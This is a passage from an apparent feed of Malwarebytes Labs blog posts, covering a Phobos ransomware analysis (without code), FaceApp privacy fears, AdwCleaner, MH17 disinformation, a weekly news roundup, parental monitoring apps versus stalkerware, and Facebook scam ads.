The decrypted 128 bytes long RSA key is imported with the help of the function RSA_pub_key_new. After that, the imported RSA key is used for encryption of the random AES key:

Summing up, the AES key seems to be protected correctly, which is bad news for the victims of this ransomware.

Attacking network shares

Phobos has a separate thread dedicated to attacking network shares.

Network shares are enumerated in a loop:

Comparison with Dharma

Previous sources references Phobos as strongly based on Dharma ransomware. However, that comparison was based mostly on the outer look: a very similar ransom note, and the naming convention used for the encrypted files. The real answer in to this question would lie in the code. Let’s have a look at both, and compare them together. This comparison will be based on the current sample of Phobos, with a Dharma sample (d50f69f0d3a73c0a58d2ad08aedac1c8).

If we compare both with the help of BinDiff, we can see some similarities, but also a lot of mismatching functions.

Fragment of code comparison: Phobos vs Dharma

In contrast to Phobos, Dharma loads the majority of its imports dynamically, making the code a bit more difficult to analyze.

Dharma loads mosts of its imports at the beginning of execution

Addresses of the imported functions are stored in an additional array, and every call takes an additional jump to the value of this array. Example:

In contrast, Phobos has a typical, unobfuscated Import Table

Before the encryption routine is started, Dharma sets a mutex: “Global\syncronize_<hardcoded ID>”.

Both, Phobos and Dharma use the same implementation of the RSA algorithm, from a static library. Fragment of code from Dharma:

The fragment of the function “bi_mod_power” from:

File encryption is implemented similarly in both. However, while Dharma uses AES implementation from the same static library, Phobos uses AES from Windows Crypto API.

Fragment of the AES implementation from Dharma ransomware

Looking at how the key is saved in the file, we can also see some similarities. The protected AES key is stored in the block at the end of the encrypted file. At the beginning of this block we can see some metadata that are similar like in Phobos, for example the original file name (in Phobos this data is encrypted). Then there is a 6 character long identifier, selected from a hardcoded pool.

The block at the end of a file encrypted by Dharma

Such identifier occurs also in Phobos, but there it is stored at the very end of the block. In case of Phobos this identifier is constant for a particular sample.

The block at the end of a file encrypted by Phobos Conclusion

Phobos is an average ransomware, by no means showing any novelty. Looking at its internals, we can conclude that while it is not an exact rip-off Dharma, there are significant similarities between both of them, suggesting the same authors. The overlaps are at the conceptual level, as well as in the same RSA implementation used.

As with other threats, it is important to make sure your assets are secure to prevent such compromises. In this particular case, businesses should review any machines where Remote Desktop Procol (RDP) access has been enabled and either disable it if it is not needed, or making sure the credentials are strong to prevent such things are brute-forcing.

Malwarebytes for business protects against Phobos ransomware via its Anti-Ransomware protection module:

The post A deep dive into Phobos ransomware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

FaceApp scares point to larger data collection problems

Malwarebytes - Wed, 07/24/2019 - 16:38

Last week, if you thumbed your way through Facebook, Instagram, and Twitter, you likely saw altered photos of your friends with a few extra decades written onto their faces—wrinkles added, skin sagged, hair bereft of color.

Has 2019 really been that long? Not really.

The photos are the work of FaceApp, the wildly popular, AI-powered app that lets users “age” pictures of themselves, change their hairstyles, put on glasses, and present a different gender.

Then, seemingly overnight, users, media reports, and members of Congress turned FaceApp into the latest privacy parable: If you care about your online privacy, avoid this app at all costs, they said.  

It’s operated by the Russian government, suggested the investigative outlet Forensic News.

It’s a coverup to train advanced facial recognition software, theorized multiple Twitter users.

It’s worthy of an FBI investigation, said Senator Chuck Schumer of New York.

The truth is less salacious. Here’s what we do know.

FaceApp’s engineers work out of St. Petersburg, Russia, which is not by any means a mark against the company. FaceApp does not, as previously claimed, upload a user’s entire photo roll to servers anywhere in the world. FaceApp’s Terms of Service agreement does not claim to transfer the ownership of a user’s photos to the company, and FaceApp’s CEO said the company would soon update its agreement to more accurately describe that the company does not utilize user content for “commercial purposes.”

Finally, the blowback against FaceApp—for what the company could collect, per its privacy policy, and how it could use that data—is a bit skewed. Countless American companies allow themselves to do the same exact thing today.

“The language you quoted to me, I recommend you look at the terms on Facebook or any other sort of user-generated service, like YouTube,” said Mitch Stoltz, senior staff attorney at Electronic Frontier Foundation, when we read FaceApp’s agreement to him over the phone.  

“It’s almost word-for-word,” Stoltz said. “All that verbiage, in a vacuum, sounds broad, but if you think about it, those are the terms used by almost any website that allows users to upload photos.”

But the takeaway from this week of near-hysteria should not be complacency. Instead, the story of FaceApp should serve as yet another example supporting the always-relevant, sometimes-boring guideline for online privacy: Ask questions first, download later (if at all).

FaceApp’s terms of service agreement

When users download and use FaceApp, they are required to agree to the parent company’s broad Terms of Service agreement. Those terms are extensive:

“You grant FaceApp a perpetual, irrevocable, nonexclusive, royalty-free, worldwide, fully-paid, transferable sub-licensable license to use, reproduce, modify, adapt, publish, translate, create derivative works from, distribute, publicly perform and display your User Content and any name, username or likeness provided in connection with your User Content in all media formats and channels now known or later developed, without compensation to you.”

Further, users are told through the Terms of Service agreement that “by using the Services, you agree that the User Content may be used for commercial purposes.”

This covers, to put it lightly, a lot. But it is far from unique, Stoltz said.  

“Any website that allows anyone in the world to post photos is going to have a clause like that—‘by uploading photos you give us permissions to do anything with it,’” Stoltz said. “It protects them against all manner of users trying to bring legal claims, where, oh, they only wanted four copies of a photo, not 10 copies. The possibilities are endless.”

Several years ago, CNN dug through some of the most dictatorial terms of service agreements for popular social media platforms, Internet services, and companies, and found that, for example, LinkedIn claimed it could profit from users’ ideas.

Relatedly, Terms of Service, Didn’t Read, which evaluates companies’ user agreements, currently shows that Google and Facebook can use users’ identities in advertisements shown to other users, and that the two companies can also track your online activity across other websites.

Stoltz also clarified that FaceApp’s Terms of Service agreement does not claim to take the copyright of a photo away from whoever took that photo—a process that would be difficult to do in a contract.

“It’s been tried—it’s something the courts don’t like,” Stoltz said.

Stoltz also said that, while consumers do have the option to bring a legal challenge against a contract they allege is unfair, such successful challenges are rare. Stoltz gave one example of where that worked, though: a judge sided with a rental car customer who challenged a company’s extra charge every time the driver sped past the speed limit.

“The court said nuh-uh, you can’t bury that in a contract and expect people to fully understand that,” Stolz said.

As to how FaceApp will actually use user-generated photos, FaceApp CEO Yaroslav Goncharov told Malwarebytes Labs in an email that the company plans to update its terms to better reflect that it does not use any users’ images for “commercial purposes.”

“Even though our policy reserves potential ‘commercial use,’ we don’t use it for any commercial purposes,” Goncharov said. “We are planning to update our privacy policy and TC to reflect this fact.”

Dispelling the rumors

On July 17, United States Sen. Schumer asked the FBI and the Federal Trade Commission to investigate FaceApp because of the app’s popularity, the location of its parent company, and its alleged potential link to foreign intelligence operations in Russia.

The next day, Sen. Schumer spoke directly to consumers in a video shared on Twitter, hammering on the same points:

“The risk that your facial data could also fall into the hands of something like Russian intelligence, or the Russian military apparatus, is disturbing,” Schumer said.

But, according to FaceApp’s CEO, that isn’t true. In responding to questions from The Washington Post, Goncharov said the Russian government has no access to user photos, and, further, that unless a user actually lives in Russia, user data is not located in the country.

Goncharov also told The Washington Post that user photos processed by FaceApp are stored on servers run by Google and Amazon.

In responding to questions from Malwarebytes Labs, Goncharov clarified that the company removes photos from those servers based on a timer, but that sometimes, if there is a large quantity of photos, the removal process can actually take longer than the chosen time limit itself.

“You can set a policy for an [Amazon Simple Storage] bucket that says ‘delete all files that are older than one day.’ In this case, almost all photos may be deleted in 25 hours or so. However, if you have too many incoming photos it can take longer than one hour (or even 24 hours) to delete all photos that are older than 24 hours,” Goncharov said. “[Amazon Web Services] doesn’t provide a guarantee that it takes less than a day to complete a bucket policy. We have a similar situation with Google Cloud.”

Another concern that some users raised about FaceApp was the possibility that the app was accessing and downloading every photo locally stored on a user’s device.

But, again, the rumors proved to be overblown. Cybersecurity researchers and an investigation by Buzzfeed News revealed that the network traffic between FaceApp and its servers did not show any nefarious hoovering of user data.

“We didn’t see any suspicious increase in the size of outbound traffic that would indicate a leak of data beyond permitted uploads,” Buzzfeed News wrote. “We uploaded four pictures to FaceApp, which corresponds with the four spikes in the graphic, with some noise at the end after the fourth upload.”

Finally, despite the many distressed comments on Twitter, Goncharov also told The Washington Post that his company is not using its technology for any facial recognition purposes.

What you should do

We get it—FaceApp is fun. Sadly, for many, online privacy is less so. (We disagree.) But that does not make online privacy any less important.

For those of you who have already downloaded and used FaceApp, the company recently described an ad-hoc method for removing your data from their servers:

“We accept requests from users for removing all their data from our servers. Our support team is currently overloaded, but these requests have our priority. For the fastest processing, we recommend sending the requests from the FaceApp mobile app using ‘Settings->Support->Report a bug’ with the word ‘privacy’ in the subject line. We are working on the better UI for that.”

For those of you who want to avoid these types of problems in the future, there’s a simple rule: Read an app’s terms of service agreement and privacy policy before you download and use it. If the agreements and policies are too long to read through—or too filled with jargon to parse—you can always avoid downloading the app altogether.

Always remember, the fear of missing out on the latest online craze should be weighed against the fear of having your online privacy potentially invaded.

The post FaceApp scares point to larger data collection problems appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Your device, your choice: AdwCleaner now detects preinstalled software

Malwarebytes - Tue, 07/23/2019 - 21:40

For years, Malwarebytes has held firm to a core belief about you, the user: You should be able to decide for yourself which apps, programs, browsers, and other software end up on your computer, tablet, or mobile phone.

Basically, it’s your device, your choice.

With the latest update to Malwarebytes AdwCleaner, we are working to further cement that belief into reality. AdwCleaner 7.4.0 now detects preinstalled software.

What is preinstalled software? Preinstalled software is software that typically comes pre-loaded on a new computer separate from the operating system. Most preinstalled software is not necessary for the proper functioning of your computer. In fact, in some cases, it may have the negative effect of impacting the computer’s performance by using memory, CPU, and hard drive resources. 

Preinstalled software can be the manufacturer-provided systems control panel. It can be the long-outdated antivirus scanner. It can be the never-heard-of photo editor, the wedged-in social gaming platform, the all-too-sticky online comparison shopper. 

So, why remove it? Besides the potential for performance impacts, we simply feel that when you buy a device—whether that’s a laptop for school, work, or fun—you should have the right to choose which programs are installed. That right should also apply to the types of software that can show up preinstalled with a device, before you even had a say in the matter.

Preinstalled software applications can be difficult to remove. They linger, buzzing around your digital environment while dodging simple uninstall attempts. We want to change that.

We also want to be clear here: Preinstalled software is not malicious. Instead, for some users, preinstalled applications serve more as an annoyance.

Advanced users typically prefer to remove all non-essential applications from their systems. With the latest version of AdwCleaner, we extend that capability to users of all technical abilities. AdwCleaner now allows users the option to quarantine and uninstall unnecessary, sometimes performance-degrading, preinstalled applications.

Is there a pre-packaged app that is not necessary for your machine to run? You have the option to get rid of it. Is there a pre-installed, superfluous program taking up vital space on your computer? Feel free to get rid of it.
And if you accidentally remove a preinstalled application by mistake, the newest version of AdwCleaner allows you to completely restore it from the quarantine.

You should be able to choose the programs that end up on your device. With the latest update to Malwarebytes AdwCleaner, that choice is in closer reach.

The post Your device, your choice: AdwCleaner now detects preinstalled software appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malaysia Airlines Flight 17 investigation shows Russian disinformation campaigns have global reach

Malwarebytes - Tue, 07/23/2019 - 15:54

A little background: on July 17, 2014, Malaysia Airlines Flight 17 was shot from the sky on its way from Amsterdam to Kuala Lumpur above the Ukraine. The plane was hit by a surface-to-air missile, and as a result, all 298 people on board were killed.

At that time, there was a revolt of pro-Russian militants against the Ukrainian government. Both the Ukrainian military and the separatists denied responsibility for the incident. After investigation of the crash site and reconstruction of the plane wreck, it was determined that the missile was fired from a BUK air defense missile system.

The BUK systems originated from the former Soviet Union but are in use by several countries. Three military presences in the region possessed the weaponry identified as behind the damage. (There were also Russian forces in the region as “advisors” for the separatists.) For this reason, it was difficult to investigate who was responsible for the attack.

Here’s where cybersecurity comes into play. Social media and leaked data played an important role in this investigation. And they also play an important role in the propaganda that the Russians used, and are continuing to use, to invalidate the methods and results of the investigation.

By following the cybersecurity breadcrumbs, we can determine which information released online is legitimate and which is a deliberate disinformation. However, most casual readers don’t go that far—or can’t—as they don’t have the technical capability to validate information sources.

How can they (we) sort out fiction from fact? Here’s what we know about the investigation into MH17, Russian disinformation, and which countermeasures can be put in place to fight online propaganda.

The investigation

On June 19, 2019, the Joint Investigation Team (JIT) that was set up to investigate this incident issued warrants for four individuals that they hold responsible: They are three Ukrainian nationals and one Russian national. They were not the crew of the BUK missile launcher, but the men believed to be behind the transport and deployment of the Russian BUK missile launcher.

The Netherlands had already held Russia responsible at an earlier stage of the investigation because they found sufficient information to show that the BUK launcher originated from Russia and was manned by Russian soldiers. Both the Ukraine and Russia have laws against extradition of their nationals, so the chances of hearing from the suspects are slim-to-none. So how can we learn exactly what happened?

Finding information

Immediately after the incident, the JIT started to save 350 million webpages with information about the region where the incident took place. These pages were saved because otherwise important information could be lost or removed. By using photos and videos that were posted on social media, they were able to track back the route that the BUK system took to reach the place from which the fatal missile was launched.

Dashcams are immensely popular in Russia and surrounding countries, because they provide evidence in insurance claims. So there was a lot of material available to work with. And the multitude of independent sources made it hard to contradict the conclusions. Also, part the route could be confirmed by using satellite images made by Digital Globe for Google Earth.

By using VKontakte (a Russian social media platform much like Facebook), a Bellingcat researcher was able to reconstruct the crew that manned the BUK system at the time of the incident. And the Ukrainian secret security service (SBU) gladly provided wiretaps of pro-Russian separatists “ordering” a BUK system and coordinating the transport to the Ukraine. Bellingcat was even able to retrieve a traffic violation record confirming the location of one of the vehicles accompanying the BUK system.

Because Bellingcat is a private organization, it has fewer rules and regulations to follow as the official investigation team (JIT), which gives them an edge when it comes to using certain sources of information. If you are interested in the information they found and especially how they found it, you really should read their full report.

If nothing else, it shows how a determined group of people can use all the little pieces of information you leave behind online to draw a pretty comprehensive picture. In fact, researchers have reasons to believe that Bellingcat was stirring up enough dirt to become the target of a spear-phishing attack attributed to the Russian group Fancy Bear APT.

These attacks are suspected to have been attempts to take over Bellingcat accounts enabling the Russians to create even more confusion. The Dutch team that investigated the incident scene reported phishing and hacking attempts as well.

Creating disinformation

Russia has a special department of disinformation called the Internet Research Agency (IRA) which headquarters in St.Petersburg. They started an orchestrated campaign to put the blame for the incident with the Ukrainian military.

While the IRA would love to influence international opinion about what happened to MH17, there’s way too information (aka facts) out there that would prove them wrong. Instead, they are focusing on their domestic audience to influence the country’s own public opinion. Knowing that their government shot down a commercial airliner would not go down well. So, blogs were written that blamed the Ukrainian military and many thousands of fake accounts started pointing to those blogs. In the first two days after the disaster alone, this amounted to 66,000 Tweets. 

Every time the JIT issued new information about their findings, the IRA started a new campaign with “alternative” information. This prolonged campaign and the sheer mass of disinformation did have one advantage. The platforms that the IRA used were able to gather a lot of information about the operation and link the social media accounts that were involved.

In 2018, Twitter issued an update mentioning the IRA as they removed almost 4,000 Russian accounts believed to be associated with the group, which amassed:

10 million Tweets and 2 million images, GIFs, videos, and Periscope broadcasts

Twitter certainly wasn’t the only platform the IRA used to spread disinformation, but it’s the only platform that disclosed their information about the “fake news factory.” You can find the same disinformation posted on Facebook, VKontakte, and in the comments sections of many websites.

Their goal is simple. When the public reads 20 different stories about the same news item, they no longer know which one to believe. An interesting version promoted by the IRA was that the BUK missile must have been intended for a plane that Russian president Putin was traveling in and which had presumably passed shortly before the incident. It’s easy to track down information proving that this wasn’t true, but most readers won’t go that far.

Yet another conspiracy theory linked the Ukrainian military with Western governments. Russia has a long history of conspiracy theories that are used both to entertain the audience and to lead them away from reality.

Countermeasures against disinformation

Since 2016, the US has become aware of Russian interference in online information, communications, and even elections—but we haven’t found a surefire fix for fake news. Europe caught on a bit earlier, but in the interest of undermining democracies, a simple piece of disinformation can unravel hundreds of years of progress.

Before the United States figured out how to respond and while Europe was cautiously evaluating the online landscape, their adversaries were able to evolve and advance their disinformation techniques. Russia is not alone: there are other nations that would like to see democratic societies upended. Iran, North Korea, and China are learning from the Russians how to play the game of disinformation.

Obvious methods to counter the possible influence of disinformation are education, finding trusted sources, and transparency. But even in a democracy, these are not always the first resort for those in powerful positions.

Education empowers people to make up their own mind based on gathered information. Transparency gives them the tools to make decisions based on facts and not fiction. And finding trusted sources means first digging deep into their backgrounds, learning whether their methods of reporting are honorable, and establishing a consistent pattern of truth-telling.

You can ask yourself whether it is a good strategy to rely on the self-moderation that has been imposed on social media platform, but at the moment this is our first line of defense. US Congress has prepared legislation that would increase ad transparency, govern data use, and establish an interagency fusion cell to coordinate government responses against disinformation, but these are all laws waiting to be passed for now.

Unlimited research

Another question that is reflexively brought up by this matter is how we can increase the effectiveness of official investigators like JIT to the level of Bellingcat without giving them a free pass to hack their way into every imaginable system.

An official international “police force” might be needed to conduct investigations for the international courts that already are in place, with warrants to demand information from any source that might have it. However, this doesn’t work when suspects, such as those in the MH17 investigation, are protected from the law if they stay in their own country.

We know the courts and investigators should be provided with more adequate ways to gather evidence, but this is no easy matter to solve without jeopardizing the very free will we are trying to protect. It will require a lot of diplomacy and negotiation if we ever want to achieve this.

A little warning

Since the interest in this incident has risen again after the official disclosure of some of the main suspects, we may see a revival of MH17-related phishing campaigns. Previous campaigns pretended to be memorial sites for the victims but lead victims to fake sites that seduced visitors to allow push notifications or to download video players infected with PUPs or malware.

Stay on the lookout, as cybercriminals—whether of Russian origin or not—are always looking to capitalize on tantalizing news stories or moments of public confusion.

And when in doubt, the best advice we can give is to be cautious when exploring the Internet and view any information you read through the lens of caution. Find your trusted sources, educate yourself, and look for those who are transparent.

Stay safe, everyone!

The post Malaysia Airlines Flight 17 investigation shows Russian disinformation campaigns have global reach appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (July 15 – 21)

Malwarebytes - Mon, 07/22/2019 - 15:50

Last week on Malwarebytes Labs, we took an extensive look at Sodinokibi, one of the new ransomware strains found in the wild that many believe picked up where GandCrab left off. We also profiled Extenbro, a Trojan that protects adware; reported on the UK’s new Facebook reporting tool, homed in on new Magecart strategies that render them ‘”bulletproof;” identified challenges faced by the education sector in the age of cybersecurity; and looked at how older generations keep up with the fast-paced evolution of tech.

Other cybersecurity news:
  • An exploit called Media File Jacking gives hackers access to the personal media files of WhatsApp and Telegram users, allowing for the interception, misuse, or manipulation of files. (Source: Venture Beat)
  • Remember the Zoom webcam vulnerability? RingCentral and Zhumu, two other video conferencing software programs, are also affected by the same flaw. (Source: BuzzFeed News)
  • A bug in Instagram that allows someone to bypass 2FA to hack any account was made public. Facebook quickly fixed the issue. (Source: Threatpost)
  • Sodinokibi isn’t the only ransomware borne from older ransomware. DoppelPaymer emerged from BitPaymer, too. (Source: Bleeping Computer)
  • Schools continue to be vulnerable on the cybersecurity side. And while ransomware is their current big problem, DDoS attacks are the second. (Source: The Washington Post)
  • FaceApp has been in hot water these past few days due to its connection with Russia. The company broke its silence and denied storing users’ photographs without permission. (Source: The Guardian)
  • EvilGnome, a new backdoor, was found to target and spy on Linux users. (Source: Bleeping Computer)
  • To prove a point, researchers made an Android app that targets insulin pumps, either to withhold or give lethal dosages of insulin, threatening patient lives. (Source: WIRED)
  • Some browser extensions are found to have collected browsing histories of millions of users. This gigantic leaking is dubbed DataSpii, and Chrome and Firefox users are affected. (Source: Ars Technica)
  • Meet Ke3chang, an APT group that are out to get diplomatic missions. (Source: ESET’s We Live Security Blog)

Stay safe, everyone!

The post A week in security (July 15 – 21) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Parental monitoring apps: How do they differ from stalkerware?

Malwarebytes - Mon, 07/22/2019 - 15:00

In late June, Malwarebytes revived its long-running campaign against a vicious type of malware in use today. This malware peers into text messages. It pinpoints victims’ movements across locations. It reveals browsing and search history. Often hidden from users, it removes their expectation of, right to, and real-world privacy.

But after we recommitted our staunch opposition to this type of malware—called stalkerware—we received questions about something else: Parental monitoring apps.

The capabilities between the two often overlap.

TeenSafe, which retooled its product to focus on safe driving, previously let parents read their children’s text messages. Qustodio, recommended by the Wirecutter for parents who want to limit their children’s device usage, lets parents track their kids’ locations. Kidguard, clearly named and advertised as a child safety app, lets parents view their children’s browsing and search history.

Quickly, the line becomes blurred. What are the differences between stalkerware apps and parental monitoring apps? What is an “acceptable” or “safe” parental monitoring app? And how can a parent know whether they’re downloading a “legitimate” parental monitoring app instead of a stalkerware app merely disguised as a tool for parents?

Malwarebytes Labs is not here to tell people how to parent their children. We are here to investigate, report, and inform.

Knowing what we do about parental monitoring apps—their capabilities, their cybersecurity vulnerabilities, and their privacy implications—our safest recommendation is to avoid these apps.

However, we understand the digital challenges facing parents today. Cyber bullying remains a constant concern, violent images and videos profligate online, and extremist content lingers across multiple platforms.

Diana Freed, a PhD student at the Intimate Partner Violence tech research lab led by Cornell Tech faculty, said she understands the appeal of these tools for parents. They advertise safety, she said.

“I believe that when parents are putting these apps on someone’s phone, they’re trying to do it to make their child safer,” Freed said. “They’re not saying ‘I don’t want my child to not have privacy.’ They think they’re doing the best they can to make this a safer place for their child.”

However, Freed explained, there is a lot to these apps that parents should know.

“Let’s assume that everyone is a good actor and wants to do the right thing,” Freed said. “But it is a matter of, is it clear to that parent what these apps are doing?”

What’s the difference?

Multiple privacy advocates and cybersecurity researchers said that, when comparing the technical capabilities of parental monitoring apps to those of stalkerware apps, the light that shines between the two is dim, if not entirely absent.

“Is there a line between legitimate monitoring apps and stalkerware apps?” said Cynthia Khoo, author of the CitizenLab report on stalkerware “Predator in Your Pocket.”

She answered her own question:

“On a technological level, no. There is no differentiation.”

Khoo explained that, when working with her co-authors on the Predator in Your Pocket paper, the team initially struggled with how to address monitoring applications that advertise themselves in benign, non-predatory ways, yet provide users with reams of sensitive information. It is the famous “dual-use” problem with stalkerware: some apps, though not advertised or designed for invasive monitoring, still provide the same capabilities.

That struggle disappeared though, Khoo said, when the team realized that apps could be evaluated by their capabilities, and whether those capabilities could violate the laws of Canada, where CitizenLab is located.

“We realized that if an app is not just providing location monitoring, if it’s collecting information from social media accounts, the private contents of someone’s phone—in Canadian law, that could be seen as unlawful interception of someone’s phone, unauthorized access to someone’s computer,” Khoo said. “Regardless of branding or marketing, that’s a criminal offense.”

Emory Roane, policy counsel at Privacy Rights Clearinghouse, said that, not only are the technical capabilities of stalkerware apps and parental monitoring apps highly similar, the capabilities themselves can be found within the type of hacking tools used by nation states.

“If you look at the capabilities: What results can be gathered from devices implanted with stalkerware versus devices hacked by nation states? It’s the same,” Roane said. “Turning on and off the device remotely, key loggers, tracking via GPS, all of this stuff.”

Roane continued: “We have to be very careful about the use of these by parents.”

Both Roane and Khoo also warned about the lack of consent allowed by many of these apps. Some stalkerware apps, like mSpy, FlexiSPY, and Hoverwatch, can operate entirely hidden from view, absent from a device’s app drawer.

Some parental monitoring apps offer the exact same feature.

Particularly concerning, we found that the app Kidguard actually reviewed the stalkerware app mSpy on its own website. In the list of pros and cons for mSpy, Kidguard listed the following as a positive:

“Operates 100% invisibly, cannot be detected.”

This invisible capability is a clear warning sign about any monitoring app, Khoo said.

“There is no legitimate reason or need to hide surveillance if it is truly for a genuine, good faith, legal, legitimate purpose,” Khoo said. “If you have the person’s consent, you don’t need to hide. If you don’t have consent, this shouldn’t be used in the first place.”

We agree.

Any monitoring app designed to hide itself from the end-user is designed against consent.

The cybersecurity risks

The cybersecurity reputations of several parental monitoring apps are questionable, as the companies behind them have left data—including photos and videos of children—vulnerable to threat actors and hackers.

In 2017, Cisco researchers disclosed multiple vulnerabilities for the network device “Circle with Disney,” a tool meant to monitor a child’s Internet usage. The researchers found that Circle with Disney had vulnerabilities that could have let a hacker “gain various levels of access and privilege, including the ability to alter network traffic, execute arbitrary remote code, inject commands, install unsigned firmware, accept a different certificate than intended, bypass authentication, escalate privileges, reboot the device, install a persistent backdoor, overwrite files, or even completely brick the device.”

In 2018, a UK-based cybersecurity researcher found two unsecured cloud servers operated by TeenSafe. Located on the servers were tens of thousands of accounts details—including parents’ email addresses and children’s Apple ID email addresses, along with their device names, unique identifiers, and plaintext passwords.

ZDNet, which covered the vulnerability, wrote:

“Because the app requires that two-factor authentication is turned off, a malicious actor viewing this data only needs to use the credentials to break into the child’s account to access their personal content data.”

Also in 2018, the parental monitoring company Family Orbit—which offers an app on iOS and Android—left open cloud storage servers that contained an eye-popping 281 gigabytes of sensitive data. The vulnerable servers, identified by an online hacker, contained photographs and videos of children.

These are just the cybersecurity flaws. This is nothing to mention the labyrinthine network of related third parties that could work with parental monitoring apps, receiving collected data and storing it across other, potentially unsecure servers littered across the web.

Steadily, the American public has begun to understand and push back on the many ways in which their data is shared with numerous third parties, often without their express, individualized consent. If it isn’t okay for adults, is it okay for children?

The privacy risks

Parental monitoring apps can give parents a near-omniscient, unfiltered view into their children’s lives, granting them access to text messages, shared photos, web browsing activity, locations visited, and call logs. Without getting consent from a child, these surveillance capabilities represent serious invasions of privacy.

Privacy Rights Clearinghouse’s Roane compared the clandestine use of these apps to a more familiar analogue:

“Would you support breaking into your child’s diary if this was the ’80s?” Roane said. “This is extremely sensitive information.”

Multiple studies have suggested that the relationship between parents and children can be significantly altered depending on the types of surveillance pushed onto them, with the age of a child playing a significant role. As a child grows older—and as their need for privacy ties closely into their autonomy—digital monitoring can potentially hinder their trust in their parents, their self-expression, and their mental health.

A few years ago, UNICEF published a discussion paper that warned of this very problem:

“The tension between parental controls and children’s right to privacy can best be viewed through the lens of children’s evolving capacities. While parental controls may be appropriate for young children who are less able to direct and moderate their behaviour online, such controls are more difficult to justify for adolescents wishing to explore issues like sexuality, politics, and religion.”

The paper also warned that strict parental controls could impair a child’s ability to “seek outside help or advice with problems at home.”

According to the science magazine Nautilus, a one-year study of junior high students in the Netherlands showed that students who were snooped on by their parents reported “more secretive behaviors, and their parents reported knowing less about the child’s activities, friends, and whereabouts, compared to other parents.”

Laurence Steinberg, a professor of psychology at Temple University, told Nautilus that when parents invade their children’s privacy, those children could be more at risk to suffer from depression, anxiety, and withdrawal. She told the outlet:

“There’s a lot of research indicating that kids who grow up with overly intrusive parents are more susceptible to those mental health problems, partly because they undermine the child’s confidence in their abilities to function independently.”

Further, in the 2012 report, “Surveillance Technologies and Children,” the Office of the Privacy Commissioner of Canada suggested that parents who rely on surveillance to keep their children safe risk stunting the maturity of those children.

Tonya Rooney, a researcher in child development and relationships at the Australian Catholic University, said in the report:  

“We need to question whether the technologies may be depriving children of the opportunity to develop confidence and competence in skills that would in turn leave them in a stronger position to assess and manage risks across a broad range of life experiences.” 

Unfortunately, this field of study is relatively new. As the children subject to parental monitoring apps reach adulthood, more can be measured, including whether those children will accept other forms of surveillance—like from domestic partners and governments.

If you’re looking for a pithy takeaway, maybe read Gizmodo’s article about a University of Central Florida study of teen monitoring apps: “Teen Monitoring Apps Don’t Work and Just Make Teens Hate Their Parents, Study Finds.”

Tough, necessary conversations

We understand that telling readers about the never-ending downsides of parental monitoring apps fails to address the likely reality that many parents have engaged in some type of digital monitoring in a safe, healthy, and openly-communicated way.

For those who have found safe passage, well done. For those who have not, the researchers we spoke to all agreed on one priority: If you absolutely insist on using one of these apps, you should discuss it with your children.

“You can openly say [to a child] ‘I am going to start looking at your location because we’re concerned and this is how we’re going to do it,’” said Freed of the IPV tech lab at Cornell. “In terms of the child’s privacy, have a conversation on the concerns and why you’re doing it, what the app you’re putting on their phone will do, what information you’ll know.”

Freed continued:

“Work through it together.”

Freed also suggested that parents could introduce only one type of digital monitoring at a time. For each additional capability—location tracking, social media monitoring, browser activity monitoring—Freed said parents should have a new conversation.

Parents that are curious about a parental monitoring app’s capabilities—including whether that app could violate privacy—should read the description available online through the App Store or the Google Play Store, said Sam Havron, another researcher and PhD student at the IPV tech lab.

“The best thing, or the closest thing, is to look at the developers’ descriptions on the marketplaces, look at the permission levels,” Havron said. He said parents could also download the app and try it out on a separate device before utilizing it on a child’s device.

Ellen Zavian, the parent of a 13-year-old boy and a member of the Tech and Safety Subcommittee for the Montgomery County Council of Parent-Teacher Associations in Maryland, suggested that parents look at the issue differently: Don’t focus so much on device software, focus on the device.

Instead of installing a screen-time-limiting app on a child’s device, or limiting what they see, or what apps they can use, remove the device entirely from the child’s room and don’t let them use it at night when they go to bed, Zavian said. Or maybe don’t let them own a device at all, which Zavian is pledging to do until her son starts eighth grade—a popular movement with parents called Wait Until 8th.

She also suggested only giving a child a Wi-Fi enabled device with no data plan, and then unplugging the home router to stop any Internet activity. Or parents could even prevent a child’s device from connecting to the home Internet, a setup that can be configured on most modern routers.

Zavian pressed on her point, making a comparison to another stressful moment in parenting—letting teenagers drive. She said there’s a difference between monitoring a teenager’s driving through apps and monitoring the teenager’s access to the car itself.

“When my friends were monitoring their kids with where they were driving to, my kids just wouldn’t have keys to the car,” Zavian said. “Why do you want to engage in that fight—you’ve got enough fights when they’re teenagers—where you say ‘I saw you went here,’ or ‘I saw you were speeding here.’”

Zavian suggested that parents remember there are always alternatives to using a parental monitoring app. In fact, those alternatives have existed for far longer, and she learned about them herself when learning to drive.

“Just like we did—you get into a car accident, you’re off the insurance,” Zavian said.

The post Parental monitoring apps: How do they differ from stalkerware? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

New Facebook ad reporting tool launches in UK

Malwarebytes - Fri, 07/19/2019 - 15:00

Last year, well-known consumer advice expert Martin Lewis decided to take Facebook to court for defamation. The cause? Multiple bogus adverts placed on the social network featuring his likeness, appearing via the ad network Outbrain.

As a trusted face in consumer causes, scammers bolting Lewis’ face onto rogue ads would always be a money spinner. This would, of course, have the knock-on effect of potentially damaging his reputation, especially with tales of victims losing as much as £100,000

By the time he’d seen around 50 advertisements promoting various Bitcoin scams, enough was enough—especially as he felt reporting the ads got him nowhere.

Making bogus ads for fun and profit

Regular readers will no doubt be familiar with these types of bogus ads hawking swiped images of trusted individuals. It’s essentially the same as we saw a while back on compromised profile pages, all promoting some wonderful new money-making scheme courtesy of Ellen. However you stack it up, people are out of pocket.

In Lewis’ case, some of the ads looked like they were from British newspapers, or other established news sources. Many offered up the usual social engineering tactic of a ticking timer: “Get this offer soon before it runs out!” Work-from-home riches, revolutionary opportunities, making huge amounts from “small” investments—every sleazy claim you could imagine were all present and accounted for, and they all were situated next to or above Lewis looking enthusiastic (and talking about something utterly unrelated).

Facebook banned crypto-themed ads, but these Lewis-themed efforts simply replaced pictures of Bitcoin with pictures of him and sent them to cryptocurrency sites elsewhere. The Lewis ads in question were centered on incredibly dubious binary trading scams.

What is binary trading?

